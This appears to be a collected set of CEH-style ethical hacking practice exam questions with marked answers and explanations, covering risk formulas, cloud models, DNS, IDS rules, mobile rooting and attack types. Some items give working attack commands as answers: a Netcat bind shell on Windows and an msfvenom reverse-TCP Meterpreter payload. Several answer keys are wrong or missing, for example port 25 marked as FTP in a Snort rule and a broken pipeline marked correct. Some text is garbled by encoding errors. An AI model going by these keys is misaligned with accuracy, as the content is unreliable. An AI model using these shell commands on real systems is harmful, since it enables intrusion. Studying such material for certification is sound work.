Q 4
Q 4
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
---------------------
3.Which of the following best describes an effort to identify systems that are
critical for the continuation of operation for the organization?
MTD
BCP
BIA-------------------
DRP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
This description is best matched by the Business Impact Analysis.
Although maximum tolerated downtime is part of the process, and a continuity plan
does address it, a BIA is a real process for identifying those important systems.
4.Enacted in 2002, this U.S. law requires every Federal agency to implement
information security programs, including significant reporting on compliance and
accreditation. What is this law?
FISMA-------------------
OSSTM
NIST 800-53
HIPAA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
FISMA has been in effect since 2002 and was last revised in 2014.
It delegated certain information security duties to NIST, OMB, and other government
agencies, and appointed the Department of Homeland Security (DHS) as the
operational lead for budgets and security guidelines.
5.Brad has done some research and decided a certain set of systems on his network
fails once every ten years. The purchase price for each of these systems is 1,200.
In addition, Brad finds the administrators on staff, who earn $50 an hour and
estimate five hours to replace a machine. Five employees, earning $25 an hour,
depending on each system and will be completely unproductive while it is down. If
you were to ask Brad for an ALE on these devices, what would he answer?
$207.50-------------------
$2075
$120
$1200
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
ALE = ARO × SLE.
Divide the number of occurrences by the number of years (1 occurrence / 10 years =
0.1) to get ARO.
To calculate SLE, add the purchase price (1200) to the time required to replace
(5*50 = 250) and the amount of lost work (5 hours*5 employees*25 = 625).
In this scenario, the total is $2075. ALE = 0.1*2075, which equals $207.50.
6.Which of the following tools is the best option for rooting the device if you
wish to gain administrative privileges over your Android device?
Pangu
SuperOneClick-------------------
evasi0n7
Cydia
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
SuperOneClick is a rooting tool for Android. The rest are jailbroken iOS options.
8.User A is writing a sensitive email message to user B outside the local network.
User A has chosen to use PKI to secure his message and ensure only user B can read
the sensitive email. At what layer of the OSI layer does the encryption and
decryption of the message take place?
A. Application
B. Transport
C. Session
D. Presentation Most Voted
Correct Answer: D
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The presentation layer or layer 6 of the OSI model is typically responsible for
encryption and decryption
9.Identify the UDP port that Network Time Protocol (NTP) uses as its primary means
of communication?
A. 113
B. 69
C. 123
D. 161
Correct Answer: C
11.Choose the action that will provide some protections against the risk security
when some operations promote the use of mobile devices in the enterprise and
security disagrees. Given that multiple risks are associated adding mobile devices
to the network.
Implement MDM.-------------------
Implement WPA.
Add MAC filtering to all WAPs.
Ensure all WAPs are from a single vendor.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Mobile Device Management will not eliminate all of the risks associated with the
ongoing use of mobile devices on your network, but it will help.
12.for performing a bluebugging attack, which of the following is the best choice?
Blooover-------------------
BBProxy
btCrawler
PhoneSnoop
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Blooover is intended to be used for bluebugging.
Blackberry utilities include BBProxy and PhoneSnoop, while btCrawler is a discovery
tool.
15.Which jailbreaking methods will keep the phone jailbroken even after it is
rebooted?
Untethered------------------
Rooted
Tethered
Semi-tethered
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The device remains jailbroken indefinitely, with or without connection to another
device if untethered jailbreaking is being used.
17.Which of the following methods is the best way to crack the network key if a
WPA2 wireless network is discovered during a pen test?
Capture a large amount of initialization vectors and crack the key inside.
Use a sniffer to capture the SSID.
WPA2 cannot be cracked.
Capture the WPA2 authentication traffic and crack the key.-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WPA2 is a strong encryption method, but with enough time, practically everything
can be hacked.
Capturing the password pairwise master key (PMK) during the handshake is the only
method to achieve it, and even then it's very difficult if the password is complex.
23.Which does not define a method of data transmission that violates a security
policy in the following?
Session hijacking
Covert channel
Backdoor channel
Overt channel-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Overt channels are legal and are utilized legally. Everything else on the list is
naughty.
24.How does Tripwire (and similar applications) protect against Trojan attacks?
Tripwire is a file-integrity-checking application that rejects malware packets
intended for the kernel.
Tripwire is a file-integrity-checking application that notifies you when a system
file has been altered, potentially indicating malware.-------------------
Tripwire is an AV application that quarantines and removes malware immediately.
Tripwire is an AV application that quarantines and removes malware after a scan.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Tripwire is a well-known file integrity verification that can assist in the
prevention of Trojans by alerting you instantly when a critical file is altered.
26.Which sequence numbers would the server willingly accept as part of this session
with a window size of 5? During a TCP data exchange, the client provided a sequence
number of 100, while the server provided a sequence number of 500. During
acknowledgments, the packet displays the agreed-upon sequence numbers 101 and 501,
respectively.
102 through 501
Anything above 501
102 through 106-------------------
102 through 502
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The server will receive packets 102 through 106 before providing an acknowledgment,
which beginning with the acknowledged sequence number 101.
28.Which is the appropriate syntax for creating a command shell on port 56 using
Netcat on Windows systems?
nc -L 56 -t -e cmd.exe-------------------
nc -r 56 -c cmd.exe
nc -p 56 -o cmd.exe
nc -port 56 -s -o cmd.exe
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
To leave a command shell open on port 56, this is the correct syntax for using
Netcat.
29.For the system or service, which DoS categories consume all available bandwidth?
TCP state-exhaustion attacks
Volumetric attacks-------------------
Fragmentation attacks
Application attacks
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For the system or service, volumetric attacks consume all available bandwidth.
31.In the attack, which doesn’t use ICMP in the following? (select two answers)
Peer to peer-------------------
Smurf
SYN flood-------------------
Ping of Death
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A SYN flood, like a peer-to-peer attack, does not utilize ICMP at all.
34.An attacker does a Whois search on a target company and finds the technical
point of contact (POC) and site ownership e-mail addresses. He then composes an e-
mail to the owner from the technical POI, instructing him to visit a link to view
the site's online statistics. Instead, the link takes you to a bogus website where
your credentials are taken.
Spear phishing-------------------
Phishing
Human based
Man in the middle
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Spear phishing happens when an e-mail is delivered to a specified audience, even if
that audience consists of only one individual.
In this case, the attacker used recon data to build an e-mail that was more
realistic to the targeted target and hence more successful.
36.During a black-box pen test you attempt to pass IRC traffic over port 80/TCP
from a compromised web enabled host. The traffic gets blocked; however, outbound
HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?
A. Circuit
B. Stateful
C. Application Most Voted
D. Packet Filtering
Correct Answer: C
37.The following is an SOA record obtained via a zone transfer: What is the name of
the domain's authoritative DNS server, and how frequently will secondary servers
check in for updates?
Hidden @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com.
(
4 ; serial number
3600 ; refresh [1h]
600 ; retry [10m]
86400 ; expire [1d]
3600 ) ; min TTL [1h]
DNSRV1.anycomp.com, 3,600 seconds-------------------
postmaster.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 4 seconds
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The SOA always begins by defining the authoritative server (in this example,
DNSRV1), followed by e-mail contact information along with a few additional items.
The refresh time specifies how frequently secondary servers will check for updates—
in this example, 3,600 seconds (1 hour).
38.Which DNS record allows you to alias both services to the same record (IP
address) if you have an FTP service and an HTTP site on a single server?
NS
CNAME-------------------
PTR
SOA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
CNAME records are used to create aliases in a zone.
39.Which of the following best describes the role that CSIRT - US Computer Security
Incident Response Team provides?
Vulnerability measurement and assessments for the U.S. Department of Defense.
Pen test registration for public and private sector.
A reliable and consistent point of contact for all incident response services for
associates of the Department of Homeland Security.-------------------
Incident response services for all Internet providers.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In collaboration with the Department of Homeland Security, CSIRT provides incident
response services to any user, company, agency, or organization.
41.Which of the following rules are correct for this situation: You are configuring
Snort rules and want an alert message of "Attempted FTP" on any FTP packet
originating from an outside IP and destined for one of your internal hosts.
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:″Attempted FTP
″)-------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:″Attempted FTP″)
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:″Attempted FTP″)
alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:″Attempted FTP″)
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The syntax for Snort rules is the same: action protocol src address src port ->
dest address port (options).
42.Which Wireshark display filter displays all packets including the term Facebook?
tcp contains facebook-------------------
tcp.all contains ==facebook
display==facebook
content==facebook
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The following Wireshark display filter is appropriate: The search string is
contained in tcp.
44.An attacker attached a laptop to a switch port and activated a sniffer. The NIC
is set to promiscuous mode, and the laptop is left alone for a few hours to collect
information.
The packet capture will display all traffic intended for the
laptop.-------------------
The packet capture will provide only the MAC addresses of the laptop and the
default gateway.
The packet capture will provide the MAC addresses of other machines connected to
the switch.-------------------
The packet capture will display all traffic intended for the default gateway.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Switches filter or flood traffic based on the address.
Broadcast traffic, such as ARP requests and answers, is flooded to all ports.
Unicast traffic, such as traffic intended for the laptop itself or the default
gateway, is sent only to the port on which the machine rests.
45.Which of the following is most likely true in the situation that your customer
tells you they understand beyond a doubt an attacker is sending messages back and
forth from their network, yet the IDS doesn’t appear to be alerted on the traffic?
The attacker is sending messages over an SSL tunnel.-------------------
The attacker has configured a trunk port on a switch.
The attacker has corrupted ACLs on every router in the network.
The attacker has set up port security on network switches.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The bane of IDS’ existence is Encryption.
The IDS is blind as a bat if traffic is encrypted.
48.What can you infer from this username login attempt if a security administrator
monitoring logs comes across a user login attempt that reads UserJoe)(&)?
The attacker is attempting SOAP injection.
The attacker is attempting SQL injection.
The attacker is attempting LDAP injection.-------------------
The attacker is attempting directory traversal.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The )(&) denotes an attempt at LDAP injection.
49.A business's accounting department detects multiple orders that appear to have
been placed in error. While investigating the issue, you learn that the pricing of
things on various web orders does not appear to match the published pricing on the
public site. You ensure that neither the website nor the ordering database seems to
have been compromised. Furthermore, there were no alarms in the Snort logs
indicating a probable attack on the online application. Which of the following
might explain the current attack?
The attacker has used SQL injection to update the database to reflect new prices
for the items.
The attacker used Metasploit to take control of the web application.
The attacker takes control of the web application.
The attacker has copied the source code to his machine and altered hidden fields to
modify the purchase price of the items.-------------------
The attacker has taken advantage of a server-side include that altered the price.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Because the logs and IDSs reveal no direct attack in this example, the attacker
most likely transferred the source code straight to his computer and changed the
secret "price" fields on the order form. All other forms of attacks would have
readily shown themselves in some shape or other.
51.If you wanted a lightweight protocol to send real-time data over, which of these
would you use?
TCP
UDP-------------------
ICMP
HTTP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
TCP uses a three-way handshake, which is fairly heavyweight.
HTTP uses TCP and adds more on top of it.
ICMP is used for control messages.
UDP has very little overhead and is commonly used for real-time data transport.
56.Which of the following best defines this service in the case that Amazon’s EC2
provides virtual machines that can be controlled through a service API?
SaaS
PaaS
Public
IaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Amazon's EC2 service provides resizable computational capacity in the cloud via VMs
that can be controlled via an API, thereby meeting the definition of IaaS.
57.The cloud computing attacks can be best described as a CSRF attacks is which of
the following?
Session riding-------------------
Side channel
Cross-guest VM breach
Hypervisor attack
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Instead of traditional data centers, session riding is simply CSRF under a
different name and deals with cloud services.
58.Which of the following is the best choice in the security principle that applies
to cloud security if there are many benefits to cloud computing?
Separation of duties-------------------
Need to know
Least privilege
Job rotation
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
While using cloud computing does not entirely resolve the separation of duties, it
is the only option available.
By definition, the cloud may separate the data owner from the data custodian (the
cloud provider assumes the role).
59.Which component acts to manage the use, performance, and delivery of cloud
services, as well as the relationships between providers and subscribers in the
NIST Cloud Computing Reference Architecture?
Cloud consumer
Cloud provider
Cloud broker-------------------
Cloud carrier
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The broker “serves as an intermediary between the consumer and the provider,
guiding consumers through the complexities of cloud service offerings and perhaps
creating value-added cloud services.”
60.The cloud computing model is geared toward software development is which of the
following?
SaaS
Private
IaaS
PaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
PaaS is a development platform that allows subscribers to construct apps without
having to establish the infrastructure required to develop and publish software.
61.Which cloud computing model are two examples of Google Docs and Salesforce CRM?
IaaS
PaaS
SaaS-------------------
Public
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Software as a Service best describes this.
SaaS is simply a software distribution model in which the provider provides
subscribers with on-demand applications.
62.Which component acquires and uses cloud products and services in the NIST Cloud
Computing Reference Architecture?
Cloud provider
Cloud carrier
Cloud consumer-------------------
Cloud broker
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The subscriber is the customer who contracts with a supplier for services.
64.Which of the following has the responsibility of transmitting the data in the
NIST Cloud Computing Reference Architecture?
Cloud broker
Cloud carrier-------------------
Cloud consumer
Cloud provider
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The carrier, such as the power distributor for the electric grid, acts as an
intermediary for connectivity and transit between the subscriber and the provider.
65.Which is the best description of the attack being used if an attacker uses a
Metasploit auxiliary exploit to send a series of small messages to a server at
regular intervals and the server responds with 64 bytes of data from its memory?
Heartbleed-------------------
POODLE
FREAK
DROWN
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Heartbleed utilizes SSL's data-echoing acknowledgment heartbeat.
This technique is vulnerable to OpenSSL versions 1.0.1 through 1.0.1f.
68.What is the known plaintext attack used against DES which gives the result that
encrypting plaintext with one DES key followed by encrypting it with a second DES
key is no more secure than using a single key?
A. Man-in-the-middle attack
B. Meet-in-the-middle attack
C. Replay attack
D. Traffic analysis attack
Correct Answer: B
69.You need to deploy a new web-based software package for your organization. The
package requires three separate servers and needs to be available on the
Internet. What is the recommended architecture in terms of server placement?
A. All three servers need to be placed internally
B. A web server facing the Internet, an application server on the internal network,
a database server on the internal network
C. A web server and the database server facing the Internet, an application server
on the internal network
D. All three servers need to face the Internet so that they can communicate between
themselves
Correct Answer: B
70.An attacker, using a rogue wireless AP, performed an MITM attack and injected an
HTML code to embed a malicious applet in all HTTP connections. When users accessed
any page, the applet ran and exploited many machines. Which one of the following
tools the hacker probably used to inject HTML code?
A. Wireshark
B. Ettercap
C. Aircrack-ng
D. Tcpdump
Correct Answer: B
71.Which mode of IPSec should you use to assure security and confidentiality of
data within the same LAN?
A. ESP transport mode
B. ESP confidential
C. AH permiscuous
D. AH Tunnel mode
Correct Answer: A
72.Email is transmitted across the Internet using the Simple Mail Transport
Protocol. SMTP does not encrypt email, leaving the information in the message
vulnerable to being read by an unauthorized person. SMTP can upgrade a connection
between two mail servers to use TLS. Email transmitted by SMTP over TLS is
encrypted. What is the name of the command used by SMTP to transmit email over TLS?
A. OPPORTUNISTICTLS
B. UPGRADETLS
C. FORCETLS
D. STARTTLS
Correct Answer: D
74.Which of the following tools is used to analyze the files produced by several
packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?
A. tcptrace
B. Nessus
C. OpenVAS
D. tcptraceroute
Correct Answer: A
75.Which of the following Linux commands will resolve a domain name into IP
address?
A. >host-t a hackeddomain.com
B. >host-t ns hackeddomain.com
C. >host -t soa hackeddomain.com
D. >host -t AXFR hackeddomain.com
Correct Answer: A
77.An Intrusion Detection System (IDS) has alerted the network administrator to a
possibly malicious sequence of packets sent to a Web server in the network's
external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely
malicious or simply a false positive?
A. Protocol analyzer
B. Network sniffer
C. Intrusion Prevention System (IPS)
D. Vulnerability scanner
Correct Answer: A
82.You are a penetration tester working to test the user awareness of the employees
of the client XYZ. You harvested two employees' emails from some public sources and
are creating a client-side backdoor to send it to the employees via email. Which
stage of the cyber kill chain are you at?
A. Reconnaissance
B. Weaponization
C. Command and control
D. Exploitation
Correct Answer: D
84.SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests,
which may bypass authentication and allow attackers to access and/or modify data
attached to a web application. Which of the following SQLi types leverages a
database server's ability to make DNS requests to pass data to an attacker?
A. In-band SQLi
B. Union-based SQLi
C. Out-of-band SQLi
D. Time-based blind SQLi
Correct Answer: C
85.Which type of virus can change its own code and then cipher itself multiple
times as it replicates?
A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus
Correct Answer: A
86.What is the port to block first in case you are suspicious that an IoT device
has been compromised?
A. 22
B. 48101
C. 80
D. 443
Correct Answer: B
87.What is the correct way of using MSFvenom to generate a reverse TCP shellcode
for Windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
Correct Answer: C
89.Techno Security Inc. recently hired John as a penetration tester. He was tasked
with identifying open ports in the target network and determining whether the ports
are online and any firewall rule sets are encountered. John decided to perform a
TCP SYN ping scan on the target network. Which of the following Nmap commands must
John use to perform the TCP SYN ping scan?
A. nmap -sn -PO < target IP address >
B. nmap -sn -PS < target IP address >
C. nmap -sn -PA < target IP address >
D. nmap -sn -PP < target IP address >
Correct Answer: B
93.To create a botnet, the attacker can use several techniques to scan vulnerable
machines. The attacker first collects information about a large number of
vulnerable machines to create a list. Subsequently, they infect the machines. The
list is divided by assigning half of the list to the newly compromised machines.
The scanning process runs simultaneously. This technique ensures the spreading and
installation of malicious code in little time. Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique
D. Topological scanning technique
Correct Answer: C
96.Dorian is sending a digitally signed email to Poly. With which key is Dorian
signing this message and how is Poly validating it?
A. Dorian is signing the message with his public key, and Poly will verify that the
message came from Dorian by using Dorian's private key.
B. Dorian is signing the message with Poly's private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
D. Dorian is signing the message with Poly's public key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
Correct Answer: C
97.At what stage of the cyber kill chain theory model does data exfiltration occur?
A. Weaponization
B. Actions on objectives
C. Command and control
D. Installation
Correct Answer: B
98.Heather's company has decided to use a new customer relationship management
tool. After performing the appropriate research, they decided to purchase a
subscription to a cloud-hosted solution. The only administrative task that Heather
will need to perform is the management of user accounts. The provider will take
care of the hardware, operating system, and software administration including
patching and monitoring. Which of the following is this type of solution?
A. Iaas
B. Saas
C. PaaS
D. Caas
Correct Answer: B
101.Which file is a rich target to discover the structure of a website during web-
server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html
Correct Answer: B
102.Andrew is an Ethical Hacker who was assigned the task of discovering all the
active devices hidden by a restrictive firewall in the IPv4 range in a given target
network. Which of the following host discovery techniques must he use to perform
the given task?
A. UDP scan
B. ARP ping scan
C. ACK flag probe scan
D. TCP Maimon scan
Correct Answer:
107.In this form of encryption algorithm, every individual block contains 64-bit
data, and three keys are used, where each key consists of 56 bits. Which is this
encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm
Correct Answer: B
110.Steven connected his iPhone to a public computer that had been infected by
Clark, an attacker. After establishing the connection with the public computer,
Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue
communication with that computer even after being physically disconnected. Now,
Clark gains access to Steven's iPhone through the infected computer and is able to
monitor and read all of Steven's activity on the iPhone, even after the device is
out of the communication zone. Which of the following attacks is performed by Clark
in the above scenario?
A. Man-in-the-disk attack
B. iOS jailbreaking
C. iOS trustjacking
D. Exploiting SS7 vulnerability
Correct Answer: C
115.You start performing a penetration test against a specific website and have
decided to start from grabbing all the links from the main page. What is the best
Linux pipe to achieve your milestone?
A. wget https://site.com | grep ג€<a href=\ג€httpג€ | grep ג€site.comג€
B. curl -s https://site.com | grep ג€<a href=\ג€httpג€ | grep ג€site.comג€ | cut -d
ג€\ג€ג€ -f 2
C. dirb https://site.com | grep ג€siteג€
D. wget https://site.com | cut -d ג€httpג€
Correct Answer: A
117.Don, a student, came across a gaming app in a third-party app store and
installed it. Subsequently, all the legitimate apps in his smartphone were replaced
by deceptive applications that appeared legitimate. He also received many
advertisements on his smartphone after installing the app. What is the attack
performed on Don in the above scenario?
A. SIM card attack
B. Clickjacking
C. SMS phishing attack
D. Agent Smith attack
Correct Answer: D
Explanetion:-----------------------------------------------------------------------
--------------------------------------------------------------------
Agent Smith attacks are carried out by luring victims into downloading and
installing malicious apps designed and published by attackers in the form of games,
photo editors, or other attractive tools from third-party app stores such as 9Apps.
Once the user has installed the app, the core malicious code inside the application
infects or replaces the legitimate apps in the victim’s mobile device C&C commands.
The deceptive application replaces legitimate apps such as WhatsApp, SHAREit, and
MX Player with similar infected versions.
The application sometimes also appears to be an authentic Google product such as
Google Updater or Themes.
The attacker then produces a massive volume of irrelevant and fraudulent
advertisements on the victim’s device through the infected app for financial gain.
Attackers exploit these apps to steal critical information such as personal
information, credentials, and bank details, from the victim’s mobile device through
C&C commands
119.A DDoS attack is performed at layer 7 to take down web infrastructure. Partial
HTTP requests are sent to the web infrastructure or applications. Upon receiving a
partial request, the target servers opens multiple connections and keeps waiting
for the requests to complete. Which attack is being described here?
A. Desynchronization
B. Slowloris attack
C. Session splicing
D. Phlashing
Correct Answer: B